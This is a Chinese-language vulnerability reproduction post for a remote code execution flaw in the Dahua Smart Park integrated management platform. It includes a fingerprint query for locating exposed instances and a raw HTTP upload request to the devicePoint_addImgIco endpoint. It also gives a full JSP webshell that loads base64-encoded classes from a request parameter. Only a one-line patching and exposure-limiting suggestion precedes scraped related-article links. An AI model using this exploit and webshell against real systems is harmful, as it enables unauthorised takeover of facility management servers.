大华智慧园区综合管理平台RCE漏洞复现(0day)
0x01 产品简介
“大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
0x02 漏洞概述
大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
0x03 复现环境
鹰图指纹:web.body="/WPMS/asset/lib/gridster/"
0x04 漏洞复现
出现以上情况则存在漏洞
PoC
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="a.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binarytest123
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
尝试上传
验证url
http://ip:8314/upload/emap/society_new/回显的jsp文件名
PS:文件上传后,这里的端口是重定向到了8314端口
上传马子
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Content-Disposition: form-data; name="upload"; filename="b.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary<%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);}}
%>
<%String cls = request.getParameter("passwd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}
%>
--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
尝试连接
0x05 修复建议
建议使用相关系统的用户在尽快打补丁的同时,做好访问来源的限制,尽量避免大华智慧园区综合管理平台暴露在公网或不安全的网络环境中。
大华智慧园区综合管理平台RCE漏洞复现(0day)相关推荐
- php智慧社区,智慧园区综合管理平台智慧社区解决方案
智慧园区综合管理平台智慧社区解决方案 源中瑞智慧园区物联网综合管理平台集消防.安防.设备.运营.能源.停车等于一体,源中瑞智慧园区集成系统分为1个总控中心和8个分控中心,集成楼宇自控(BMS).公共安 ...
- 智慧社区综合管理平台——需求文档(第九组)
目录 1.引言 1.1 项目简介 1.2 目的 1.3 文档的范围 1.4 预期的读者和阅读建议 1.5 产品的范围 1.6 参考文献 2.总体描述 2.1 产品视角 2.2 用户特征 2.3 系统 ...
- 智慧水务综合管理平台解决方案,助力水司数字化管理
平台概述 智慧水务综合管理平台是以物联感知技术.大数据.智能控制.云计算.人工智能.数字孪生.AI算法.虚拟现实技术为核心,以监测仪表.通讯网络.数据库系统.数据中台.模型软件.前台展示.智慧运维等产 ...
- 智慧城市综合管理平台功能清单
智慧城市综合管理平台功能清单 一.九大标准子系统 序号 子系统名称 功能模块备名称 备注 1 无线数据采集子系统 用户管理 用户的权限.角色进行分配和设置.能进行方便而实用的登录和退出操作 考勤管理 ...
- 智慧城市综合管理平台,以一种更智慧的方式促进城市运行
智慧城市综合管理平台是在新一代信息技术加速发展的背景下,充分运用大数据.云计算.物联网等技术手段对公共服务.社会管理.产业运作等活动的各种需求做出智能响应,将生产.商业.运输.通信.医疗等城市运行的各 ...
- 易云维医院智慧后勤综合管理平台打造智能化信息化后勤管理模式
由于我国医疗信息化建设起步较晚,资金支持不足,缺乏统筹规划等,与世界平均水平相比还有较大差距,尤其是县级医院,未能构建医院智慧后勤综合管理平台,信息化发展不平衡,发展程度不高,普及程度和应用深度仍有较 ...
- 城市智慧路灯综合管理平台、图监控、灯箱实时监控、策略管理、故障报警、灯具管理、数据统计、故障分析、开关灯记录分析、区域管理、分组管理、DIV+CSS布局设计、HTML/Bootstrp/jQuery
源码类别: 后台模板 文件大小: 21.5 MB 源码内容:城市智慧路灯综合管理平台后台模板 前端技术: HTML/CSS/Bootstrap/jQuery 模板语言: 简体中文 ...
- 智慧社区综合管理平台——小组展示1
智慧社区综合管理平台 一.项目概况 甲方需求 1.1 需求简介 本项目是为了开发涵盖社区居民服务.社区日常管理.社区物业等多个领域.基于互联网思维的智慧社区综合管理服务云平台.希望依托该系统来构建面向 ...
- 城市智慧路灯综合管理平台模板,DIV+CSS布局设计
城市智慧路灯综合管理平台模板,DIV+CSS布局设计,全套模板,包括地图监控.灯箱实时监控.策略管理.故障报警.历史数据.灯具管理.数据统计.故障分析.开关灯记录分析.区域管理.分组管理等HTML后台 ...
最新文章
- leetcode 5. Longest Palindromic Substring 字符串中的最长回文数 逐步从O(n^2)优化至线性时间
- 数字图像处理——第九章 形态学图像处理
- blockboard vs canvas
- Codeforces 1025G Company Acquisitions (概率期望)
- 安装caffe碰到的坑
- latex插入表格心得
- 食疗去除头屑的小偏方 不错!
- 论文解读丨图神经网络应用于半结构化文档的命名实体识别和关系提取
- PyTorch的hook及其在Grad-CAM中的应用
- Tomcat服务安全加固和优化
- leetcode--组合总数
- Glib2之spec编译打包rpm(九)
- event.keyCode 事件属性
- 外螺纹对照表_螺纹螺距对照表
- 收藏!万字长文盘点美国、德国、日本和韩国数字科技创新战略
- C语言的进制转换以及算法实现
- Python Numpy dtype=complex 及查看数据类型
- v4手游服务器维护,v4手游每日必做事项分享
- mysql 字符集 表情_MySQL字符集(表情包)
- FFmpeg获取视频旋转角度rotate获取不到的问题解决